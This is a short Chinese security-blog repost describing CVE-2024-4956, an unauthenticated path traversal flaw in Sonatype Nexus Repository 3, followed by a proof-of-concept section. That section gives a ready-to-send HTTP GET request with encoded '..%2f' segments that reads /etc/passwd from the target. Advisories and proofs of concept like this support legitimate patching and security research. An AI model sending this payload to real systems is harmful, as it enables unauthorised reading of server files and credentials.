Nexus Reposity3目录穿越漏洞CVE-2024-4956

admin 2024年8月3日15:39:36评论19 views字数 491阅读1分38秒阅读模式

1. 漏洞描述

    Sonatype Nexus Repository 3(Sonatype Nexus 3)是一个由Sonatype开发的仓库管理工具,用于管理和托管各种软件构件(如Maven构件、Docker镜像等)。它提供了一种集中化的方式来存储、管理和分发软件构件,以帮助团队协作和构建自动化。Sonatype Nexus Repository 3 存在路径遍历漏洞(CVE-2024-4956),未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。

Nexus Reposity3目录穿越漏洞CVE-2024-4956

2. 漏洞复现

GET /.%2f/..%2f/..%2f/..%2f/..%2f/etc/passwd HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36Connection: close

Nexus Reposity3目录穿越漏洞CVE-2024-4956

原文始发于微信公众号(蟹堡安全团队):Nexus Reposity3目录穿越漏洞CVE-2024-4956

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月3日15:39:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nexus Reposity3目录穿越漏洞CVE-2024-4956https://cn-sec.com/archives/3028567.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息